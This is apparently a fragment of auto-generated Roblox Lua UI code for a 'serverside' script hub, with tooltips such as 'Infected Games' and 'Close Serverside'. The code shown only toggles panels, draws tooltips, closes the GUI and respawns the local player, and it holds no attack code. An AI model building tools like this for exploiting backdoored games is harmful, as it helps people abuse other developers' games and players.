-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_2e()
local script = G2L["2e"];
	local button = script.Parent
	local mainframe = button.Parent
	local scriptFrame = mainframe:FindFirstChild("ScriptHubFrame")
	
	button.MouseButton1Click:Connect(function()
		if scriptFrame then
			scriptFrame.Visible = not scriptFrame.Visible
		end
	end)
end;
task.spawn(C_2e);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_2f()
local script = G2L["2f"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Infected Games"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_2f);
-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
local function C_3c()
local script = G2L["3c"];
	local textLabel = script.Parent
	
	while true do
		textLabel.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 1, 1)
		task.wait(0.03)
	end
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_42()
local script = G2L["42"];
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	button.MouseButton1Click:Connect(function()
		if screenGui then
			screenGui:Destroy()
		end
	end)
end;
task.spawn(C_42);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_43()
local script = G2L["43"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Close Serverside"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_43);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_4b()
local script = G2L["4b"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local player = game:GetService("Players").LocalPlayer
		local character = player.Character or player.CharacterAdded:Wait()
		local humanoid = character:WaitForChild("Humanoid")
	
		humanoid.Health = 0
	end)
end;
task.spawn(C_4b);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_4c()
local script = G2L["4c"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Respawn"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_4c);
-- StarterGui.ScreenGui.Frame.Logs.LocalScript
local function C_52()
local script = G2L["52"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Change Logs"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_52);
-- StarterGui.ScreenGui.Frame.Logs.LocalScript
local function C_53()
local script = G2L["53"];
	local screenGui = script.Parent:FindFirstAncestorOfClass("ScreenGui")
	local frame = screenGui:FindFirstChild("Frame")
	local logsFrame = frame:FindFirstChild("UpdateFrame")
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		if logsFrame then
			logsFrame.Visible = not logsFrame.Visible
		end
	end)
end;
task.spawn(C_53);

return G2L["1"], require;
